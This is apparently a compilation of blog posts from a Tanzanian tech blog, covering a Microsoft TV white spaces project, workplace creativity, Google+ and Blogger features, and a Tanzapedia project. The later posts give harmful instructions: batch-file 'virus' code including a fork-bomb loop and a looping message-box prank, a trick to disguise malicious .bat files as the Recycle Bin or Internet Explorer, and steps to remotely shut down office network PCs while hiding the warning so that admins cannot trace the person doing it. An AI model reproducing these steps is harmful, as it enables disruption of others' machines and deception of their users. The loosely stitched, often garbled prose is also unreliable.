Today, as part of our 4Afrika Initiative, we’re excited to announce another TV white spaces project – this time in Tanzania. We’re partnering with the Tanzania Commission for Science and Technology (COSTECH) and local internet service provider, UhuruOne, to provide affordable wireless broadband access to university students and faculty in Dar es Salaam. http://bit.ly/YEAcMf
By the end of the last decade, and  Begin  of the new one we owe,the ICT companies have been largely increasing in number in other parts of the globe and specifically in Africa.Even though as the number increasing, the problems are not going to stop as we always facing daily challanges especially in innovation of the new technology which is the mother of development.

It is said that most employers underutilize the creativity of their employee hence fail to capture their fertile ideas into their companies. The major reason for these can be;lack of time, absence of effective processes to manage all the ideas and the fear to demotivate the employees when ideas rejected.

Encouraging ideas is the core management task,as the curreant existing business demand great attention;stimulating the ideas is the core task in leadership, this also fascinate and endorse the organizational creativity unwillingly.

With fast changing market challanges, demand customers and smart competitors,we need new ways to innovate and raise the new challanges.Being more creative is our only way to become resilient in time of Change and   Crissie will secure our sustainable success, therefore stimulating and harvesting creativity shall be our strategic priority.

The Google+ has updated a new fetures;the feature consist of the larger page viewer and positional exchanges. The google with approximately 400million users, enjoy the new features and are said to be so currious.

The other features are such as our faces have jumped from the square to the right to a cycle to the left. The endorsed features are quite different from the former features used by the  go oglers, especialy the gmail interactive is still handling the matter.

1. PROFILE IMAGERY. Now, your headshot or your brand logo appears in a circle on the bottom left corner of the cover image instead of in a square to the right. The cover photo itself is much bigger, too. Instead of a long, slim bar you’ll be working with a larger area, which means you’ll have better luck finding cover imagery since the dimensions are now much easier to work with.

2. ABOUT ME. The information page is now broken down into cards (sections) with their own Edit buttons so that related pieces of information can be edited together. This is a huge improvement from the ‘Edit Profile’ button that sat at the top of the page.

3. PROFESSIONAL DETAILS. Google has taken a hint from LinkedIn and now offers a field in Google+ profiles to list your skills, and allows you to detail your current and past positions in a job description field. We assume (hope) that one of the next enhancements in this section will make the Skills field suggest recognized skills as you type. LinkedIn already does this, and as we’d expect Google, as its search engine has autocomplete capabilities already, to add the feature as well.

3. EDUCATION DETAILS. In addition to your university and graduation year, you are now also able to highlight courses you have taken. For students looking to enter the working world, this is a great way (not to mention an SEO-friendly way) to put your interests and experience on display and increase your relevance within your desired field.

If you open your blog on the left hand side options tabs you will find an option written Overview. The Blogger Overview Tab allows you to observe the page views which are related to your site and how you have been performing in terms of viewers and visitors of your blog. Inside the overview Tab you can have things like Updates, Page views, News from Blogger and tips about successful blogging.

What am interested to discuss here it is the Pageviews. Just above the digital graph which displays your blog recent activities on the right top corner you will find a link “More Stats”. This link is very important to you has a blogger to understand the traffic status of your blog.

Hint: Web analytics is the measurement, collection, analysis and reporting of internet data for purposes of understanding and optimizing web

On clicking the link it will take you inside the Stats tab. Inside the Stats tab you will be able to observe. Pageviews in Categories, Traffic sources and popular posts in your Blog, the pageviews categories will show you the number of the visit to your blog, currently, the day before, the month before and the total page views. Each link provides enough details on what you need to know. The traffic source shows you the main sources of your traffic wither are from a social networking site or any other particular site so that you can get a chance to update your tricks and emphasize on another source of traffic or enhance the one which you are having currently.

You can explore “more” link on just below the traffic sources tab you will be surprised with what you can find it is the “audience” tab, one of my favorite tabs. The audience tab allows you to observe your page views by country, Pageviews by Browsers and Pageviews by Operating systems showing their actual percentage. This can help you to determine what to focus on and what to enhance. For example: If most of your traffic source comes from Mozilla Firefox and you blog doesn’t function well on it you might want to do something to maintain your traffic, this is how these information can help you. For Pageviews by country it can help you to understand the source of your audience this can help you to find the local contents or contents which corresponds to the exact particular audience which is the main source of your traffic.
Remember all these tabs can be accessed directly on the left hand main column by just clicking on the Stats Tab the drop down menu will appear that will help you to navigate through the tabs and explore your options.

I have this project entitled Tanzapedia is about, a free online encyclopedia about Tanzania. “It is Tanzania on Tanzanians perception” that is the slogan behind the project.
The project is big it cover all the regions in Tanzania, giving details about each city and local towns found. From the weather forecast of the city to the origin of its name, simply everything the region has to offer. I started the project few months back; I have already developed the pilot of the project. I have collected a lot of articles and resources from the local communities.

From the tribes eating habits and so many other stuffs, the site has been made in such a way that people can contribute on the article by posting directly on the site and the admin will verify their post before allowing it to be the part of the article using AJAX and PHP.

The project has used several open source platforms for making charts and pictorial presentations. Most of the mathematical details have been calculated using Wolfram Alpha search engine  and detailed information about Tanzanian cities, history and culture have obtained them from Google books from the local Tanzanian writers.

The project is available for free for any one soon. I will upload it for every to see but if there is going to be an individual who want to continue the project by himself. Please contact me before the end of this week before I give the access to everyone.

I want someone who is passionate, committed and technology enthusiasts to continue with the project. I will provide him with all the materials and resources I have for him to accomplish the task. Geeks out there, this is your opportunity, use it wisely.

You can have the general idea of the project from this blog tanzapedia.blogspot.com, but please that is not the project just a demo......

It is a normal thing when you want to loge in to your accounts in some browsers you will be asked if you want the browser or the website to remember your password this is the time you stop selecting yes for your own good. The little utility Asterisk Logger does for the whole of Windows what MessenPass does for messenger
programs. It displays the passwords that you’ve entered in Outlook, in your FTTP client or in any other login-protected tool. Instead of asterisks, you will be able to see the obfuscated characters.
But even here we repeat the warning: Use this tool only for your own passwords or else it is a criminal offense. Incidentally, the program AsterWin IE displays passwords that  you’ve entered in the Internet Explorer.

Most of the times we want to use our phones for more than just a mobile phone to give it the ability to accomplish some tasks more than just making phone calls or browsing to the internet. There is a trick of switching off your computer using your mobile phone. All you need to have is the ability to send mail in your mobile phone and Microsoft outlook in your computer.

Procedures
1. First create the batch files for Hibernate, shutdown or restart using windows command and save the file with the extension of .bat
2. Inside the Notepad type [c:\windows\system32\shutdown -s -f -t 00] without the blazers]
3. Save the file as filename.bat
3. Open and Configure Microsoft Outlook in your computer or the computer you want to perform operations. Configure that Outlook checks the inbox after every 1 minute.   Go to Tools: Options.
4. Select the Mail Setup tab and then Send/Receive button.
5. Configure and check the Schedule an automatic send/receive configure the minutes to 1 and close the dialog boxes.
6. Now go to Tools: Rules and Alerts select the options button in the upper right hand corner and press the Import Rules button.
7.  Trace the Filename.bat file which you have created and select it.
8. Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown.

Ok guys, am not responsible for the consequences of your actions, just providing knowledge on how to do these things. I believe you have seen a .bat file at least once in a system. It’s a file with an icon of overlapping gear systems. The .bat files are called batch files in all the things they do they can also be used to create malicious codes in other words called virus. If these codes are written in the Notepad text editor and saved with an extension .bat file they can really cause damage to a computer or network. They can cause system to crash and file to multiply vigorously.

NOW TO MAKE A BATCH:
1) open NOTEPAD
2) start with the following script
@echo off
 followed with your commands
3) save as FILENAME.bat
4) Batch file has already been created

Example 1: let’s create a batch file which will open the CMD prompt in 4 times and give out the message “your computer will crash”.

@echo off
msg * YOUR COMPUTER WILL CRASH
start
start
start
start

Example 2: This will crash your computer for really not fun

@echo off
:loop
start joke.bat
Goto loop

Example 3: Try this at your own risk

@echo off
echo You have contacted greentech360.
echo.
pause
cls
echo Searching for greentech360
echo.
pause
msg * greentech360 found
:a
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
msg * greentech360 is coming
goto a

The message box can't be deleted unless you reboot the computer, and the funny thing is, when the person tries to hide the message box in the corner of the screen where someone can't see it, every few minutes it'll pop up in the middle of the screen.
For advanced users of the batch files you can choose to convert the files to .exe by using compilers available online. The batch files tricks can be used also to create autorun virus by just saving the file as autorun.inf. After creating a .bat file you can easily change the file icon on the desktop by just going to properties and give it a fake name such as Recycle Bin or Internet Explorer and once the user click the file the damage will be done on the system make sure you delete the original icon on the desktop and the file is a shortcut. Please it is illegal to practice these things without the prior concern of the owner of the system has fun. More tricks to come keep visiting greentech360. Please share this pals to increase my traffic.

Take your time and practice windows command prompt codes it’s amazing what you will discover about the power of these codes and the changes they could impact to the system or network. Windows command prompt codes for network includes: NET STAT, NET USER, IPCONFIG, TRACERT and others. To get information and other options available in the command simply type the command followed by (/?) and the detailed explanation of the command will be provide for example (NET USER/?) it will give you the complete list of options available for the commands view my previous article on Windows command Prompt here. Let’s get started:
We are going to shut down the network for a while:

First method
1) Open windows command prompt go to run type CMD
2) Inside the windows command prompt type cd\
3) Then type the command NET VIEW this will show all computers on the network
4) Note:  if you type NET you can see all the network options under NET command
5) If the network is not that powerful, you can shut down or log off network PCS, type
SHUTDOWN –I which will display the graphical user interface of the system provided that the security of the network is not that much enhanced.

Second method (shutting down PC’s in the network)
1) Open NOTEPAD
2) Type command.com
3) Save as The file you have juts created using NOTEPAD with .bat extension on it
4) Note:  if you type NET you can see all the network options under NET command
5) Now all you have to do is open the file inside it type SHUTDOWN –I
6) After you type SHUTDOWN –I remote shutdown dialog window will pop up with some options
7) Now go to Browse and select the network to search in and add the system you want to   shutdown in the network and just click OK it’s done you are good to go.
8) To eliminate admin tracing back to you deactivate warn the users options.
Please try this in a larger network with good security at your office or work station and give me the feedback if it works or not I will more than happy to hear from you guys. Remember do it at your own risk am a trainer not a hacker lol. Please don’t forget to share pals….
